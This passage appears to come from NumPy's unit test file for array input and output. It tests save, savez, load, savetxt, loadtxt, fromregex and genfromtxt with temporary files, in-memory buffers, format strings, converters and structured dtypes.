class TestSaveLoad(RoundtripTest, TestCase):
def roundtrip(self, *args, **kwargs):
RoundtripTest.roundtrip(self, np.save, *args, **kwargs)
assert_equal(self.arr[0], self.arr_reloaded)
class TestSavezLoad(RoundtripTest, TestCase):
def roundtrip(self, *args, **kwargs):
RoundtripTest.roundtrip(self, np.savez, *args, **kwargs)
for n, arr in enumerate(self.arr):
assert_equal(arr, self.arr_reloaded['arr_%d' % n])
@np.testing.dec.skipif(not IS_64BIT, "Works only with 64bit systems")
@np.testing.dec.slow
def test_big_arrays(self):
L = (1 << 31) + 100000
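# Just over 2**31 uint8 elements, so the saved archive exceeds 2 GiB.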
tmp = mktemp(suffix='.npz')
a = np.empty(L, dtype=np.uint8)
np.savez(tmp, a=a)
del a
npfile = np.load(tmp)
a = npfile['a']
npfile.close()
os.remove(tmp)
def test_multiple_arrays(self):
a = np.array([[1, 2], [3, 4]], float)
b = np.array([[1 + 2j, 2 + 7j], [3 - 6j, 4 + 12j]], complex)
self.roundtrip(a, b)
def test_named_arrays(self):
a = np.array([[1, 2], [3, 4]], float)
b = np.array([[1 + 2j, 2 + 7j], [3 - 6j, 4 + 12j]], complex)
c = BytesIO()
np.savez(c, file_a=a, file_b=b)
c.seek(0)
l = np.load(c)
assert_equal(a, l['file_a'])
assert_equal(b, l['file_b'])
def test_savez_filename_clashes(self):
# Test that issue #852 is fixed
# and that savez works in a multithreaded environment
def writer(error_list):
fd, tmp = mkstemp(suffix='.npz')
os.close(fd)
try:
arr = np.random.randn(500, 500)
try:
np.savez(tmp, arr=arr)
except OSError as err:
error_list.append(err)
finally:
os.remove(tmp)
errors = []
threads = [threading.Thread(target=writer, args=(errors,))
for j in range(3)]
for t in threads:
t.start()
for t in threads:
t.join()
if errors:
raise AssertionError(errors)
def test_not_closing_opened_fid(self):
# Test that issue #2178 is fixed:
# verify that we can still seek on the 'loaded' file
fd, tmp = mkstemp(suffix='.npz')
os.close(fd)
try:
fp = open(tmp, 'wb')
np.savez(fp, data='LOVELY LOAD')
fp.close()
fp = open(tmp, 'rb', 10000)
fp.seek(0)
assert_(not fp.closed)
_ = np.load(fp)['data']
assert_(not fp.closed) # must not get closed by .load(opened fp)
fp.seek(0)
assert_(not fp.closed)
finally:
fp.close()
os.remove(tmp)
def test_closing_fid(self):
# Test that issue #1517 (too many open files) stays fixed.
# It might be a "weak" test since it failed to trigger on
# e.g. Debian sid of 2012 Jul 05, but the failure was reported
# on Ubuntu 10.04:
# http://projects.scipy.org/numpy/ticket/1517#comment:2
fd, tmp = mkstemp(suffix='.npz')
os.close(fd)
try:
fp = open(tmp, 'wb')
np.savez(fp, data='LOVELY LOAD')
fp.close()
# We need to check that the garbage collector can properly close
# the npz file returned by np.load when its reference count
# goes to zero. Python 3 running in debug mode raises a
# ResourceWarning when file closing is left to the garbage
# collector, so we catch the warnings. Because ResourceWarning
# is unknown in Python < 3.x, we take the easy way out and
# catch all warnings.
with warnings.catch_warnings():
warnings.simplefilter("ignore")
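# Load the file 1024 times without keeping references; if np.load leaked
# the underlying file handle, this would exhaust the per-process
# file-descriptor limit.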
for i in range(1, 1025):
try:
np.load(tmp)["data"]
except Exception as e:
msg = "Failed to load data from a file: %s" % e
raise AssertionError(msg)
finally:
os.remove(tmp)
def test_closing_zipfile_after_load(self):
# Check that zipfile owns file and can close it.
# This needs to pass a file name to load for the
# test.
fd, tmp = mkstemp(suffix='.npz')
os.close(fd)
np.savez(tmp, lab='place holder')
data = np.load(tmp)
fp = data.zip.fp
data.close()
assert_(fp.closed)
class TestSaveTxt(TestCase):
def test_array(self):
a = np.array([[1, 2], [3, 4]], float)
fmt = "%.18e"
c = BytesIO()
np.savetxt(c, a, fmt=fmt)
c.seek(0)
assert_equal(c.readlines(),
[asbytes((fmt + ' ' + fmt + '\n') % (1, 2)),
asbytes((fmt + ' ' + fmt + '\n') % (3, 4))])
a = np.array([[1, 2], [3, 4]], int)
c = BytesIO()
np.savetxt(c, a, fmt='%d')
c.seek(0)
assert_equal(c.readlines(), [b'1 2\n', b'3 4\n'])
def test_1D(self):
a = np.array([1, 2, 3, 4], int)
c = BytesIO()
np.savetxt(c, a, fmt='%d')
c.seek(0)
lines = c.readlines()
assert_equal(lines, [b'1\n', b'2\n', b'3\n', b'4\n'])
def test_record(self):
a = np.array([(1, 2), (3, 4)], dtype=[('x', 'i4'), ('y', 'i4')])
c = BytesIO()
np.savetxt(c, a, fmt='%d')
c.seek(0)
assert_equal(c.readlines(), [b'1 2\n', b'3 4\n'])
def test_delimiter(self):
a = np.array([[1., 2.], [3., 4.]])
c = BytesIO()
np.savetxt(c, a, delimiter=',', fmt='%d')
c.seek(0)
assert_equal(c.readlines(), [b'1,2\n', b'3,4\n'])
def test_format(self):
a = np.array([(1, 2), (3, 4)])
c = BytesIO()
# Sequence of formats
np.savetxt(c, a, fmt=['%02d', '%3.1f'])
c.seek(0)
assert_equal(c.readlines(), [b'01 2.0\n', b'03 4.0\n'])
# A single multiformat string
c = BytesIO()
np.savetxt(c, a, fmt='%02d : %3.1f')
c.seek(0)
lines = c.readlines()
assert_equal(lines, [b'01 : 2.0\n', b'03 : 4.0\n'])
# Specify delimiter, should be overridden
c = BytesIO()
np.savetxt(c, a, fmt='%02d : %3.1f', delimiter=',')
c.seek(0)
lines = c.readlines()
assert_equal(lines, [b'01 : 2.0\n', b'03 : 4.0\n'])
def test_header_footer(self):
"""
Test the functionality of the header and footer keyword argument.
"""
c = BytesIO()
a = np.array([(1, 2), (3, 4)], dtype=np.int)
test_header_footer = 'Test header / footer'
# Test the header keyword argument
np.savetxt(c, a, fmt='%1d', header=test_header_footer)
c.seek(0)
assert_equal(c.read(),
asbytes('# ' + test_header_footer + '\n1 2\n3 4\n'))
# Test the footer keyword argument
c = BytesIO()
np.savetxt(c, a, fmt='%1d', footer=test_header_footer)
c.seek(0)
assert_equal(c.read(),
asbytes('1 2\n3 4\n# ' + test_header_footer + '\n'))
# Test the commentstr keyword argument used on the header
c = BytesIO()
commentstr = '% '
np.savetxt(c, a, fmt='%1d',
header=test_header_footer, comments=commentstr)
c.seek(0)
assert_equal(c.read(),
asbytes(commentstr + test_header_footer + '\n' + '1 2\n3 4\n'))
# Test the commentstr keyword argument used on the footer
c = BytesIO()
commentstr = '% '
np.savetxt(c, a, fmt='%1d',
footer=test_header_footer, comments=commentstr)
c.seek(0)
assert_equal(c.read(),
asbytes('1 2\n3 4\n' + commentstr + test_header_footer + '\n'))
def test_file_roundtrip(self):
f, name = mkstemp()
os.close(f)
try:
a = np.array([(1, 2), (3, 4)])
np.savetxt(name, a)
b = np.loadtxt(name)
assert_array_equal(a, b)
finally:
os.unlink(name)
def test_complex_arrays(self):
ncols = 2
nrows = 2
a = np.zeros((ncols, nrows), dtype=np.complex128)
re = np.pi
im = np.e
a[:] = re + 1.0j * im
# One format only
c = BytesIO()
np.savetxt(c, a, fmt=' %+.3e')
c.seek(0)
lines = c.readlines()
_assert_floatstr_lines_equal(lines,
[b' ( +3.142e+00+ +2.718e+00j) ( +3.142e+00+ +2.718e+00j)\n',
b' ( +3.142e+00+ +2.718e+00j) ( +3.142e+00+ +2.718e+00j)\n'])
# One format for each real and imaginary part
c = BytesIO()
np.savetxt(c, a, fmt=' %+.3e' * 2 * ncols)
c.seek(0)
lines = c.readlines()
_assert_floatstr_lines_equal(lines,
[b' +3.142e+00 +2.718e+00 +3.142e+00 +2.718e+00\n',
b' +3.142e+00 +2.718e+00 +3.142e+00 +2.718e+00\n'])
# One format for each complex number
c = BytesIO()
np.savetxt(c, a, fmt=['(%.3e%+.3ej)'] * ncols)
c.seek(0)
lines = c.readlines()
_assert_floatstr_lines_equal(lines,
[b'(3.142e+00+2.718e+00j) (3.142e+00+2.718e+00j)\n',
b'(3.142e+00+2.718e+00j) (3.142e+00+2.718e+00j)\n'])
def _assert_floatstr_lines_equal(actual_lines, expected_lines):
"""A string comparison function that also works on Windows + Python 2.5.
This is necessary because Python 2.5 on Windows inserts an extra 0 in
the exponent of the string representation of floating point numbers.
Only used in TestSaveTxt.test_complex_arrays; no attempt is made to make this
more generic.
Once Python 2.5 compatibility is dropped, simply use `assert_equal` instead
of this function.
"""
for actual, expected in zip(actual_lines, expected_lines):
if actual != expected:
expected_win25 = expected.replace(b"e+00", b"e+000")
if actual != expected_win25:
msg = build_err_msg([actual, expected], '', verbose=True)
raise AssertionError(msg)
class TestLoadTxt(TestCase):
def test_record(self):
c = TextIO()
c.write('1 2\n3 4')
c.seek(0)
x = np.loadtxt(c, dtype=[('x', np.int32), ('y', np.int32)])
a = np.array([(1, 2), (3, 4)], dtype=[('x', 'i4'), ('y', 'i4')])
assert_array_equal(x, a)
d = TextIO()
d.write('M 64.0 75.0\nF 25.0 60.0')
d.seek(0)
mydescriptor = {'names': ('gender', 'age', 'weight'),
'formats': ('S1',
'i4', 'f4')}
b = np.array([('M', 64.0, 75.0),
('F', 25.0, 60.0)], dtype=mydescriptor)
y = np.loadtxt(d, dtype=mydescriptor)
assert_array_equal(y, b)
def test_array(self):
c = TextIO()
c.write('1 2\n3 4')
c.seek(0)
x = np.loadtxt(c, dtype=int)
a = np.array([[1, 2], [3, 4]], int)
assert_array_equal(x, a)
c.seek(0)
x = np.loadtxt(c, dtype=float)
a = np.array([[1, 2], [3, 4]], float)
assert_array_equal(x, a)
def test_1D(self):
c = TextIO()
c.write('1\n2\n3\n4\n')
c.seek(0)
x = np.loadtxt(c, dtype=int)
a = np.array([1, 2, 3, 4], int)
assert_array_equal(x, a)
c = TextIO()
c.write('1,2,3,4\n')
c.seek(0)
x = np.loadtxt(c, dtype=int, delimiter=',')
a = np.array([1, 2, 3, 4], int)
assert_array_equal(x, a)
def test_missing(self):
c = TextIO()
c.write('1,2,3,,5\n')
c.seek(0)
x = np.loadtxt(c, dtype=int, delimiter=',', \
converters={3:lambda s: int(s or - 999)})
a = np.array([1, 2, 3, -999, 5], int)
assert_array_equal(x, a)
def test_converters_with_usecols(self):
c = TextIO()
c.write('1,2,3,,5\n6,7,8,9,10\n')
c.seek(0)
x = np.loadtxt(c, dtype=int, delimiter=',', \
converters={3:lambda s: int(s or - 999)}, \
usecols=(1, 3,))
a = np.array([[2, -999], [7, 9]], int)
assert_array_equal(x, a)
def test_comments(self):
c = TextIO()
c.write('# comment\n1,2,3,5\n')
c.seek(0)
x = np.loadtxt(c, dtype=int, delimiter=',', \
comments='#')
a = np.array([1, 2, 3, 5], int)
assert_array_equal(x, a)
def test_skiprows(self):
c = TextIO()
c.write('comment\n1,2,3,5\n')
c.seek(0)
x = np.loadtxt(c, dtype=int, delimiter=',', \
skiprows=1)
a = np.array([1, 2, 3, 5], int)
assert_array_equal(x, a)
c = TextIO()
c.write('# comment\n1,2,3,5\n')
c.seek(0)
x = np.loadtxt(c, dtype=int, delimiter=',', \
skiprows=1)
a = np.array([1, 2, 3, 5], int)
assert_array_equal(x, a)
def test_usecols(self):
a = np.array([[1, 2], [3, 4]], float)
c = BytesIO()
np.savetxt(c, a)
c.seek(0)
x = np.loadtxt(c, dtype=float, usecols=(1,))
assert_array_equal(x, a[:, 1])
a = np.array([[1, 2, 3], [3, 4, 5]], float)
c = BytesIO()
np.savetxt(c, a)
c.seek(0)
x = np.loadtxt(c, dtype=float, usecols=(1, 2))
assert_array_equal(x, a[:, 1:])
# Testing with arrays instead of tuples.
c.seek(0)
x = np.loadtxt(c, dtype=float, usecols=np.array([1, 2]))
assert_array_equal(x, a[:, 1:])
# Checking with dtypes defined converters.
data = '''JOE 70.1 25.3
BOB 60.5 27.9
'''
c = TextIO(data)
names = ['stid', 'temp']
dtypes = ['S4', 'f8']
arr = np.loadtxt(c, usecols=(0, 2), dtype=list(zip(names, dtypes)))
assert_equal(arr['stid'], [b"JOE", b"BOB"])
assert_equal(arr['temp'], [25.3, 27.9])
def test_fancy_dtype(self):
c = TextIO()
c.write('1,2,3.0\n4,5,6.0\n')
c.seek(0)
dt = np.dtype([('x', int), ('y', [('t', int), ('s', float)])])
x = np.loadtxt(c, dtype=dt, delimiter=',')
a = np.array([(1, (2, 3.0)), (4, (5, 6.0))], dt)
assert_array_equal(x, a)
def test_shaped_dtype(self):
c = TextIO("aaaa 1.0 8.0 1 2 3 4 5 6")
dt = np.dtype([('name', 'S4'), ('x', float), ('y', float),
('block', int, (2, 3))])
x = np.loadtxt(c, dtype=dt)
a = np.array([('aaaa', 1.0, 8.0, [[1, 2, 3], [4, 5, 6]])],
dtype=dt)
assert_array_equal(x, a)
def test_3d_shaped_dtype(self):
c = TextIO("aaaa 1.0 8.0 1 2 3 4 5 6 7 8 9 10 11 12")
dt = np.dtype([('name', 'S4'), ('x', float), ('y', float),
('block', int, (2, 2, 3))])
x = np.loadtxt(c, dtype=dt)
a = np.array([('aaaa', 1.0, 8.0,
[[[1, 2, 3], [4, 5, 6]],[[7, 8, 9], [10, 11, 12]]])],
dtype=dt)
assert_array_equal(x, a)
def test_empty_file(self):
with warnings.catch_warnings():
warnings.filterwarnings("ignore",
message="loadtxt: Empty input file:")
c = TextIO()
x = np.loadtxt(c)
assert_equal(x.shape, (0,))
x = np.loadtxt(c, dtype=np.int64)
assert_equal(x.shape, (0,))
assert_(x.dtype == np.int64)
def test_unused_converter(self):
c = TextIO()
c.writelines(['1 21\n', '3 42\n'])
c.seek(0)
data = np.loadtxt(c, usecols=(1,),
converters={0: lambda s: int(s, 16)})
assert_array_equal(data, [21, 42])
c.seek(0)
data = np.loadtxt(c, usecols=(1,),
converters={1: lambda s: int(s, 16)})
assert_array_equal(data, [33, 66])
def test_dtype_with_object(self):
"Test using an explicit dtype with an object"
from datetime import date
import time
data = """ 1; 2001-01-01
2; 2002-01-31 """
ndtype = [('idx', int), ('code', np.object)]
func = lambda s: strptime(s.strip(), "%Y-%m-%d")
converters = {1: func}
test = np.loadtxt(TextIO(data), delimiter=";", dtype=ndtype,
converters=converters)
control = np.array([(1, datetime(2001, 1, 1)), (2, datetime(2002, 1, 31))],
dtype=ndtype)
assert_equal(test, control)
def test_uint64_type(self):
tgt = (9223372043271415339, 9223372043271415853)
c = TextIO()
c.write("%s %s" % tgt)
c.seek(0)
res = np.loadtxt(c, dtype=np.uint64)
assert_equal(res, tgt)
def test_int64_type(self):
tgt = (-9223372036854775807, 9223372036854775807)
c = TextIO()
c.write("%s %s" % tgt)
c.seek(0)
res = np.loadtxt(c, dtype=np.int64)
assert_equal(res, tgt)
def test_universal_newline(self):
f, name = mkstemp()
os.write(f, b'1 21\r3 42\r')
os.close(f)
try:
data = np.loadtxt(name)
assert_array_equal(data, [[1, 21], [3, 42]])
finally:
os.unlink(name)
def test_empty_field_after_tab(self):
c = TextIO()
c.write('1 \t2 \t3\tstart \n4\t5\t6\t \n7\t8\t9.5\t')
c.seek(0)
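# The last ('comment') field is 'start ', a lone space, and empty on the
# three rows; the assertion below checks these trailing fields survive.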
dt = { 'names': ('x', 'y', 'z', 'comment'),
'formats': ('<i4', '<i4', '<f4', '|S8')}
x = np.loadtxt(c, dtype=dt, delimiter='\t')
a = np.array([b'start ', b' ', b''])
assert_array_equal(x['comment'], a)
def test_structure_unpack(self):
txt = TextIO("M 21 72\nF 35 58")
dt = { 'names': ('a', 'b', 'c'), 'formats': ('|S1', '<i4', '<f4')}
a, b, c = np.loadtxt(txt, dtype=dt, unpack=True)
assert_(a.dtype.str == '|S1')
assert_(b.dtype.str == '<i4')
assert_(c.dtype.str == '<f4')
assert_array_equal(a, np.array([b'M', b'F']))
assert_array_equal(b, np.array([21, 35]))
assert_array_equal(c, np.array([ 72., 58.]))
def test_ndmin_keyword(self):
c = TextIO()
c.write('1,2,3\n4,5,6')
c.seek(0)
assert_raises(ValueError, np.loadtxt, c, ndmin=3)
c.seek(0)
assert_raises(ValueError, np.loadtxt, c, ndmin=1.5)
c.seek(0)
x = np.loadtxt(c, dtype=int, delimiter=',', ndmin=1)
a = np.array([[1, 2, 3], [4, 5, 6]])
assert_array_equal(x, a)
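# ndmin=2 guarantees at least two dimensions: a single row parses as shape
# (1, 3) and a single column as (3, 1), while ndmin=1 and ndmin=0 leave
# 1-D data with shape (3,).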
d = TextIO()
d.write('0,1,2')
d.seek(0)
x = np.loadtxt(d, dtype=int, delimiter=',', ndmin=2)
assert_(x.shape == (1, 3))
d.seek(0)
x = np.loadtxt(d, dtype=int, delimiter=',', ndmin=1)
assert_(x.shape == (3,))
d.seek(0)
x = np.loadtxt(d, dtype=int, delimiter=',', ndmin=0)
assert_(x.shape == (3,))
e = TextIO()
e.write('0\n1\n2')
e.seek(0)
x = np.loadtxt(e, dtype=int, delimiter=',', ndmin=2)
assert_(x.shape == (3, 1))
e.seek(0)
x = np.loadtxt(e, dtype=int, delimiter=',', ndmin=1)
assert_(x.shape == (3,))
e.seek(0)
x = np.loadtxt(e, dtype=int, delimiter=',', ndmin=0)
assert_(x.shape == (3,))
# Test ndmin kw with empty file.
with warnings.catch_warnings():
warnings.filterwarnings("ignore",
message="loadtxt: Empty input file:")
f = TextIO()
assert_(np.loadtxt(f, ndmin=2).shape == (0, 1,))
assert_(np.loadtxt(f, ndmin=1).shape == (0,))
def test_generator_source(self):
def count():
for i in range(10):
yield "%d" % i
res = np.loadtxt(count())
assert_array_equal(res, np.arange(10))
class Testfromregex(TestCase):
# np.fromregex expects files opened in binary mode.
def test_record(self):
c = TextIO()
c.write('1.312 foo\n1.534 bar\n4.444 qux')
c.seek(0)
dt = [('num', np.float64), ('val', 'S3')]
x = np.fromregex(c, r"([0-9.]+)\s+(...)", dt)
a = np.array([(1.312, 'foo'), (1.534, 'bar'), (4.444, 'qux')],
dtype=dt)
assert_array_equal(x, a)
def test_record_2(self):
c = TextIO()
c.write('1312 foo\n1534 bar\n4444 qux')
c.seek(0)
dt = [('num', np.int32), ('val', 'S3')]
x = np.fromregex(c, r"(\d+)\s+(...)", dt)
a = np.array([(1312, 'foo'), (1534, 'bar'), (4444, 'qux')],
dtype=dt)
assert_array_equal(x, a)
def test_record_3(self):
c = TextIO()
c.write('1312 foo\n1534 bar\n4444 qux')
c.seek(0)
dt = [('num', np.float64)]
x = np.fromregex(c, r"(\d+)\s+...", dt)
a = np.array([(1312,), (1534,), (4444,)], dtype=dt)
assert_array_equal(x, a)
#####--------------------------------------------------------------------------
class TestFromTxt(TestCase):
#
def test_record(self):
"Test w/ explicit dtype"
data = TextIO('1 2\n3 4')
# data.seek(0)
test = np.ndfromtxt(data, dtype=[('x', np.int32), ('y', np.int32)])
control = np.array([(1, 2), (3, 4)], dtype=[('x', 'i4'), ('y', 'i4')])
assert_equal(test, control)
#
data = TextIO('M 64.0 75.0\nF 25.0 60.0')
# data.seek(0)
descriptor = {'names': ('gender', 'age', 'weight'),
'formats': ('S1', 'i4', 'f4')}
control = np.array([('M', 64.0, 75.0), ('F', 25.0, 60.0)],
dtype=descriptor)
test = np.ndfromtxt(data, dtype=descriptor)
assert_equal(test, control)
def test_array(self):
"Test outputting a standard ndarray"
data = TextIO('1 2\n3 4')
control = np.array([[1, 2], [3, 4]], dtype=int)
test = np.ndfromtxt(data, dtype=int)
assert_array_equal(test, control)
#
data.seek(0)
control = np.array([[1, 2], [3, 4]], dtype=float)
test = np.loadtxt(data, dtype=float)
assert_array_equal(test, control)
def test_1D(self):
"Test squeezing to 1D"
control = np.array([1, 2, 3, 4], int)
#
data = TextIO('1\n2\n3\n4\n')
test = np.ndfromtxt(data, dtype=int)
assert_array_equal(test, control)
#
data = TextIO('1,2,3,4\n')
test = np.ndfromtxt(data, dtype=int, delimiter=',')
assert_array_equal(test, control)
def test_comments(self):
"Test the stripping of comments"
control = np.array([1, 2, 3, 5], int)
# Comment on its own line
data = TextIO('# comment\n1,2,3,5\n')
test = np.ndfromtxt(data, dtype=int, delimiter=',', comments='#')
assert_equal(test, control)
# Comment at the end of a line
data = TextIO('1,2,3,5# comment\n')
test = np.ndfromtxt(data, dtype=int, delimiter=',', comments='#')
assert_equal(test, control)
def test_skiprows(self):
"Test row skipping"
control = np.array([1, 2, 3, 5], int)
kwargs = dict(dtype=int, delimiter=',')
#
data = TextIO('comment\n1,2,3,5\n')
test = np.ndfromtxt(data, skip_header=1, **kwargs)
assert_equal(test, control)
#
data = TextIO('# comment\n1,2,3,5\n')
test = np.loadtxt(data, skiprows=1, **kwargs)
assert_equal(test, control)
def test_skip_footer(self):
data = ["# %i" % i for i in range(1, 6)]
data.append("A, B, C")
data.extend(["%i,%3.1f,%03s" % (i, i, i) for i in range(51)])
data[-1] = "99,99"
kwargs = dict(delimiter=",", names=True, skip_header=5, skip_footer=10)
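# skip_header=5 drops the '#' lines, names=True consumes the "A, B, C"
# line, and skip_footer=10 drops the last ten rows (including the
# malformed "99,99" row), leaving 41 rows.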
test = np.genfromtxt(TextIO("\n".join(data)), **kwargs)
ctrl = np.array([("%f" % i, "%f" % i, "%f" % i) for i in range(41)],
dtype=[(_, float) for _ in "ABC"])
assert_equal(test, ctrl)
def test_skip_footer_with_invalid(self):
with warnings.catch_warnings():
warnings.filterwarnings("ignore")
basestr = '1 1\n2 2\n3 3\n4 4\n5 \n6 \n7 \n'
# Footer too small to get rid of all invalid values
assert_raises(ValueError, np.genfromtxt,
TextIO(basestr), skip_footer=1)
# except ValueError:
# pass
a = np.genfromtxt(TextIO(basestr), skip_footer=1, invalid_raise=False)
assert_equal(a, np.array([[1., 1.], [2., 2.], [3., 3.], [4., 4.]]))
#
a = np.genfromtxt(TextIO(basestr), skip_footer=3)
assert_equal(a, np.array([[1., 1.], [2., 2.], [3., 3.], [4., 4.]]))
#
basestr = '1 1\n2 \n3 3\n4 4\n5 \n6 6\n7 7\n'
a = np.genfromtxt(TextIO(basestr), skip_footer=1, invalid_raise=False)
assert_equal(a, np.array([[1., 1.], [3., 3.], [4., 4.], [6., 6.]]))
a = np.genfromtxt(TextIO(basestr), skip_footer=3, invalid_raise=False)
assert_equal(a, np.array([[1., 1.], [3., 3.], [4., 4.]]))
def test_header(self):
"Test retrieving a header"
data = TextIO('gender age weight\nM 64.0 75.0\nF 25.0 60.0')
test = np.ndfromtxt(data, dtype=None, names=True)
control = {'gender': np.array([b'M', b'F']),
'age': np.array([64.0, 25.0]),
'weight': np.array([75.0, 60.0])}
assert_equal(test['gender'], control['gender'])
assert_equal(test['age'], control['age'])
assert_equal(test['weight'], control['weight'])
def test_auto_dtype(self):
"Test the automatic definition of the output dtype"
data = TextIO('A 64 75.0 3+4j True\nBCD 25 60.0 5+6j False')
test = np.ndfromtxt(data, dtype=None)
control = [np.array([b'A', b'BCD']),
np.array([64, 25]),
np.array([75.0, 60.0]),
np.array([3 + 4j, 5 + 6j]),
np.array([True, False]), ]
assert_equal(test.dtype.names, ['f0', 'f1', 'f2', 'f3', 'f4'])
for (i, ctrl) in enumerate(control):
assert_equal(test['f%i' % i], ctrl)
def test_auto_dtype_uniform(self):
"Tests whether the output dtype can be uniformized"
data = TextIO('1 2 3 4\n5 6 7 8\n')
test = np.ndfromtxt(data, dtype=None)
control = np.array([[1, 2, 3, 4], [5, 6, 7, 8]])
assert_equal(test, control)
def test_fancy_dtype(self):
"Check that a nested dtype isn't MIA"
data = TextIO('1,2,3.0\n4,5,6.0\n')
fancydtype = np.dtype([('x', int), ('y', [('t', int), ('s', float)])])
test = np.ndfromtxt(data, dtype=fancydtype, delimiter=',')
control = np.array([(1, (2, 3.0)), (4, (5, 6.0))], dtype=fancydtype)
assert_equal(test, control)
def test_names_overwrite(self):
"Test overwriting the names of the dtype"
descriptor = {'names': ('g', 'a', 'w'),
'formats': ('S1', 'i4', 'f4')}
data = TextIO(b'M 64.0 75.0\nF 25.0 60.0')
names = ('gender', 'age', 'weight')
test = np.ndfromtxt(data, dtype=descriptor, names=names)
descriptor['names'] = names
control = np.array([('M', 64.0, 75.0),
('F', 25.0, 60.0)], dtype=descriptor)
assert_equal(test, control)
def test_commented_header(self):
"Check that names can be retrieved even if the line is commented out."
data = TextIO("""
#gender age weight
M 21 72.100000
F 35 58.330000
M 33 21.99
""")
# The # is part of the first name and should be deleted automatically.
test = np.genfromtxt(data, names=True, dtype=None)
ctrl = np.array([('M', 21, 72.1), ('F', 35, 58.33), ('M', 33, 21.99)],
dtype=[('gender', '|S1'), ('age', int), ('weight', float)])
assert_equal(test, ctrl)
# Ditto, but we should get rid of the first element
data = TextIO(b"""
# gender age weight
M 21 72.100000
F 35 58.330000
M 33 21.99
""")
test = np.genfromtxt(data, names=True, dtype=None)
assert_equal(test, ctrl)
def test_autonames_and_usecols(self):
"Tests names and usecols"
data = TextIO('A B C D\n aaaa 121 45 9.1')
test = np.ndfromtxt(data, usecols=('A', 'C', 'D'),
names=True, dtype=None)
control = np.array(('aaaa', 45, 9.1),
dtype=[('A', '|S4'), ('C', int), ('D', float)])
assert_equal(test, control)
def test_converters_with_usecols(self):
"Test the combination of user-defined converters and usecols"
data = TextIO('1,2,3,,5\n6,7,8,9,10\n')
test = np.ndfromtxt(data, dtype=int, delimiter=',',
converters={3:lambda s: int(s or - 999)},
usecols=(1, 3,))
control = np.array([[2, -999], [7, 9]], int)
assert_equal(test, control)
def test_converters_with_usecols_and_names(self):
"Tests names and usecols"
data = TextIO('A B C D\n aaaa 121 45 9.1')
test = np.ndfromtxt(data, usecols=('A', 'C', 'D'), names=True,
dtype=None, converters={'C':lambda s: 2 * int(s)})
control = np.array(('aaaa', 90, 9.1),
dtype=[('A', '|S4'), ('C', int), ('D', float)])
assert_equal(test, control)
def test_converters_cornercases(self):
"Test the conversion to datetime."
converter = {'date': lambda s: strptime(s, '%Y-%m-%d %H:%M:%SZ')}
data = TextIO('2009-02-03 12:00:00Z, 72214.0')
test = np.ndfromtxt(data, delimiter=',', dtype=None,
names=['date', 'stid'], converters=converter)
control = np.array((datetime(2009, 2, 3), 72214.),
dtype=[('date', np.object_), ('stid', float)])
assert_equal(test, control)
def test_converters_cornercases2(self):
"Test the conversion to datetime64."
converter = {'date': lambda s: np.datetime64(strptime(s, '%Y-%m-%d %H:%M:%SZ'))}
data = TextIO('2009-02-03 12:00:00Z, 72214.0')
test = np.ndfromtxt(data, delimiter=',', dtype=None,
names=['date', 'stid'], converters=converter)
control = np.array((datetime(2009, 2, 3), 72214.),
dtype=[('date', 'datetime64[us]'), ('stid', float)])
assert_equal(test, control)
def test_unused_converter(self):
"Test whether unused converters are forgotten"
data = TextIO("1 21\n 3 42\n")
test = np.ndfromtxt(data, usecols=(1,),
converters={0: lambda s: int(s, 16)})
assert_equal(test, [21, 42])
#
data.seek(0)
test = np.ndfromtxt(data, usecols=(1,),
converters={1: lambda s: int(s, 16)})
assert_equal(test, [33, 66])
def test_invalid_converter(self):
strip_rand = lambda x : float((b'r' in x.lower() and x.split()[-1]) or
(b'r' not in x.lower() and x.strip() or 0.0))
strip_per = lambda x : float((b'%' in x.lower() and x.split()[0]) or
(b'%' not in x.lower() and x.strip() or 0.0))
s = TextIO("D01N01,10/1/2003 ,1 %,R 75,400,600\r\n"
"L24U05,12/5/2003, 2 %,1,300, 150.5\r\n"
"D02N03,10/10/2004,R 1,,7,145.55")
kwargs = dict(converters={2 : strip_per, 3 : strip_rand}, delimiter=",",
dtype=None)
assert_raises(ConverterError, np.genfromtxt, s, **kwargs)
def test_tricky_converter_bug1666(self):
"Test some corner case"
s = TextIO('q1,2\nq3,4')
cnv = lambda s:float(s[1:])
test = np.genfromtxt(s, delimiter=',', converters={0:cnv})
control = np.array([[1., 2.], [3., 4.]])
assert_equal(test, control)
def test_dtype_with_converters(self):
dstr = "2009; 23; 46"
test = np.ndfromtxt(TextIO(dstr,),
delimiter=";", dtype=float, converters={0:bytes})
control = np.array([('2009', 23., 46)],
dtype=[('f0', '|S4'), ('f1', float), ('f2', float)])
assert_equal(test, control)
test = np.ndfromtxt(TextIO(dstr,),
delimiter=";", dtype=float, converters={0:float})
control = np.array([2009., 23., 46],)
assert_equal(test, control)
def test_dtype_with_object(self):
"Test using an explicit dtype with an object"
from datetime import date
import time
data = """ 1; 2001-01-01
2; 2002-01-31 """
ndtype = [('idx', int), ('code', np.object)]
func = lambda s: strptime(s.strip(), "%Y-%m-%d")
converters = {1: func}
test = np.genfromtxt(TextIO(data), delimiter=";", dtype=ndtype,
converters=converters)
control = np.array([(1, datetime(2001, 1, 1)), (2, datetime(2002, 1, 31))],
dtype=ndtype)
assert_equal(test, control)
#
ndtype = [('nest', [('idx', int), ('code', np.object)])]
try:
test = np.genfromtxt(TextIO(data), delimiter=";",
dtype=ndtype, converters=converters)
except NotImplementedError:
pass
else:
errmsg = "Nested dtype involving objects should be supported."
raise AssertionError(errmsg)
def test_userconverters_with_explicit_dtype(self):
"Test user_converters w/ explicit (standard) dtype"
data = TextIO('skip,skip,2001-01-01,1.0,skip')
test = np.genfromtxt(data, delimiter=",", names=None, dtype=float,
usecols=(2, 3), converters={2: bytes})
control = np.array([('2001-01-01', 1.)],
dtype=[('', '|S10'), ('', float)])
assert_equal(test, control)
def test_spacedelimiter(self):
"Test space delimiter"
data = TextIO("1 2 3 4 5\n6 7 8 9 10")
test = np.ndfromtxt(data)
control = np.array([[ 1., 2., 3., 4., 5.],
[ 6., 7., 8., 9., 10.]])
assert_equal(test, control)
def test_integer_delimiter(self):
"Test using an integer for delimiter"
data = " 1 2 3\n 4 5 67\n890123 4"
test = np.genfromtxt(TextIO(data), delimiter=3)
control = np.array([[1, 2, 3], [4, 5, 67], [890, 123, 4]])
assert_equal(test, control)
def test_missing(self):
data = TextIO('1,2,3,,5\n')
test = np.ndfromtxt(data, dtype=int, delimiter=',', \
converters={3:lambda s: int(s or - 999)})
control = np.array([1, 2, 3, -999, 5], int)
assert_equal(test, control)
def test_missing_with_tabs(self):
"Test w/ a tab delimiter"
txt = "1\t2\t3\n\t2\t\n1\t\t3"
